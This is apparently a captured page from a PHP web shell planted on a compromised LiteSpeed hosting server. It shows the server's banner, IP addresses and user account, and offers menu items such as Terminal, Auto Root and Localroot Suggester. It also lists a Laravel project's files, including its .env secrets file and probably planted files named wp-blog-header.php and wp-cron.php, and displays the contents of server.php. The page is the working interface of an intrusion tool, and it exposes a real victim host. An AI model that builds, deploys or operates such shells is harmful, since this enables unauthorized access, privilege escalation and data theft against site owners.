Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
data /
core /
Delete
Unzip
Name
Size
Permission
Date
Action
app
[ DIR ]
drwxr-xr-x
2022-09-13 11:48
bootstrap
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
config
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
database
[ DIR ]
drwxr-xr-x
2022-09-13 11:48
resources
[ DIR ]
drwxr-xr-x
2022-09-13 11:48
routes
[ DIR ]
drwxr-xr-x
2025-02-03 10:48
storage
[ DIR ]
drwxrwxr-x
2022-09-13 11:48
tests
[ DIR ]
drwxr-xr-x
2022-09-13 11:48
vendor
[ DIR ]
drwxr-xr-x
2022-09-13 12:22
.DS_Store
8
KB
-rw-r--r--
2022-10-08 13:56
.editorconfig
220
B
-rw-r--r--
2021-10-03 08:49
.env
841
B
-rw-r--r--
2025-07-18 12:23
.env.example
811
B
-rw-r--r--
2021-10-03 08:49
.gitattributes
111
B
-rw-r--r--
2021-10-03 08:49
.gitignore
191
B
-rw-r--r--
2021-10-03 08:49
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
.styleci.yml
181
B
-rw-r--r--
2021-10-03 08:49
README.md
3.69
KB
-rw-r--r--
2021-10-03 08:49
artisan
1.65
KB
-rw-r--r--
2021-10-03 08:49
composer.json
2.35
KB
-rw-r--r--
2022-09-12 08:27
composer.lock
345.86
KB
-rw-r--r--
2022-09-13 12:22
package-lock.json
508.98
KB
-rw-r--r--
2021-10-03 08:49
package.json
730
B
-rw-r--r--
2021-10-03 08:49
phpunit.xml
1.17
KB
-rw-r--r--
2021-10-03 08:49
server.php
563
B
-rw-r--r--
2021-10-03 08:49
webpack.mix.js
549
B
-rw-r--r--
2021-10-03 08:49
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php /** * Laravel - A PHP Framework For Web Artisans * * @package Laravel * @author Taylor Otwell <taylor@laravel.com> */ $uri = urldecode( parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH) ); // This file allows us to emulate Apache's "mod_rewrite" functionality from the // built-in PHP web server. This provides a convenient way to test a Laravel // application without having installed a "real" web server software here. if ($uri !== '/' && file_exists(__DIR__.'/public'.$uri)) { return false; } require_once __DIR__.'/public/index.php';